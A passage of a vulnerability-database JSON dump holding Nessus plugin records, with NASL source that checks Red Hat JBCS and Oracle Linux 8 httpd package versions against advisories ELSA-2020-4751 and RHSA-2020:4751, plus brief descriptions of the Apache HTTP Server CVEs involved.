'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_proxy_html-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_proxy_html-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_session-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_session-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ssl-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ssl-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-1.1.1c-16.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-1.1.1c-16.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-devel-1.1.1c-16.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-devel-1.1.1c-16.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-libs-1.1.1c-16.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-libs-1.1.1c-16.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-perl-1.1.1c-16.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-perl-1.1.1c-16.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-static-1.1.1c-16.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-static-1.1.1c-16.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/7/7Server/x86_64/jbcs/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/jbcs/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/jbcs/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'jbcs-httpd24-apr-1.6.3-86.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-apr-devel-1.6.3-86.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-1.0.6-21.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-devel-1.0.6-21.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-devel-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-manual-2.4.37-52.jbcs.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-selinux-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-tools-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_cluster-native-1.3.12-41.Final_redhat_2.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_http2-1.11.3-22.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ldap-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_proxy_html-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_session-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ssl-2.4.37-52.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-1.1.1c-16.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-devel-1.1.1c-16.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-libs-1.1.1c-16.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-perl-1.1.1c-16.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-openssl-static-1.1.1c-16.jbcs.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'jbcs-httpd24'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jbcs-httpd24-apr / jbcs-httpd24-apr-devel / jbcs-httpd24-brotli / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:30:39", "description": "The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2020-4751 advisory.\n\n - A vulnerability was found in Apache HTTP Server 2.4.17 to 2.4.38. Using fuzzed network input, the http/2 request handling could be made to access freed memory in string comparison when determining the method of a request and thus process the request incorrectly. (CVE-2019-0196)\n\n - In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 (mod_http2) connections. (CVE-2018-17189)\n\n - A vulnerability was found in Apache HTTP Server 2.4.34 to 2.4.38. When HTTP/2 was enabled for a http: host or H2Upgrade was enabled for h2 on a https: host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. Server that never enabled the h2 protocol or that only enabled it for https: and did not set H2Upgrade on are unaffected by this issue. (CVE-2019-0197)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with H2PushResource, could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client. (CVE-2019-10081)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown. (CVE-2019-10082)\n\n - In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. (CVE-2019-10092)\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the PROXY protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients. (CVE-2019-10097)\n\n - In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL. (CVE-2020-1927)\n\n - In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. (CVE-2019-10098)\n\n - In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server. (CVE-2020-1934)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-12T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : httpd:2.4 (ELSA-2020-4751)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-filesystem", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_http2", "p-cpe:/a:oracle:linux:mod_ldap", "p-cpe:/a:oracle:linux:mod_md", "p-cpe:/a:oracle:linux:mod_proxy_html", "p-cpe:/a:oracle:linux:mod_session", "p-cpe:/a:oracle:linux:mod_ssl"], "id": "ORACLELINUX_ELSA-2020-4751.NASL", "href": "https://www.tenable.com/plugins/nessus/142762", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-4751.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142762);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-17189\",\n \"CVE-2019-0196\",\n \"CVE-2019-0197\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2020-1927\",\n \"CVE-2020-1934\"\n );\n script_bugtraq_id(106685, 107665, 107669);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0203\");\n\n script_name(english:\"Oracle Linux 8 : httpd:2.4 (ELSA-2020-4751)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2020-4751 advisory.\n\n - A vulnerability was found in Apache HTTP Server 2.4.17 to 2.4.38. Using fuzzed network input, the http/2\n request handling could be made to access freed memory in string comparison when determining the method of\n a request and thus process the request incorrectly. (CVE-2019-0196)\n\n - In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain\n resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming\n data. This affects only HTTP/2 (mod_http2) connections. (CVE-2018-17189)\n\n - A vulnerability was found in Apache HTTP Server 2.4.34 to 2.4.38. When HTTP/2 was enabled for a http: host\n or H2Upgrade was enabled for h2 on a https: host, an Upgrade request from http/1.1 to http/2 that was not\n the first request on a connection could lead to a misconfiguration and crash. Server that never enabled\n the h2 protocol or that only enabled it for https: and did not set H2Upgrade on are unaffected by this\n issue. (CVE-2019-0197)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with H2PushResource, could lead\n to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of\n the configured push link header values, not data supplied by the client. (CVE-2019-10081)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made\n to read memory after being freed, during connection shutdown. (CVE-2019-10082)\n\n - In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the\n mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point\n to a page of their choice. This would only be exploitable where a server was set up with proxying enabled\n but was misconfigured in such a way that the Proxy Error page was displayed. (CVE-2019-10092)\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy\n server using the PROXY protocol, a specially crafted PROXY header could trigger a stack buffer overflow\n or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by\n untrusted HTTP clients. (CVE-2019-10097)\n\n - In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be\n self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within\n the request URL. (CVE-2020-1927)\n\n - In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be\n self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the\n request URL. (CVE-2019-10098)\n\n - In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a\n malicious FTP server. (CVE-2020-1934)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-4751.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_http2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/httpd');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\nif ('2.4' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module httpd:' + module_ver);\n\nappstreams = {\n 'httpd:2.4': [\n {'reference':'httpd-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.0.8-8.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_md-2.0.8-8.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_session-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_ssl-2.4.37-30.0.1.module+el8.3.0+7816+49791cfd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'}\n ]\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'httpd / httpd-devel / httpd-filesystem / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:30:09", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:4751 advisory.\n\n - httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n - httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n - httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n - httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-04T00:00:00", "type": "nessus", "title": "RHEL 8 : httpd:2.4 (RHSA-2020:4751)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_aus:8.6", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_e4s:8.6", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_eus:8.6", "cpe:/o:redhat:rhel_tus:8.4", "cpe:/o:redhat:rhel_tus:8.6", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-filesystem", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_http2", "p-cpe:/a:redhat:enterprise_linux:mod_ldap", "p-cpe:/a:redhat:enterprise_linux:mod_md", "p-cpe:/a:redhat:enterprise_linux:mod_proxy_html", "p-cpe:/a:redhat:enterprise_linux:mod_session", "p-cpe:/a:redhat:enterprise_linux:mod_ssl"], "id": 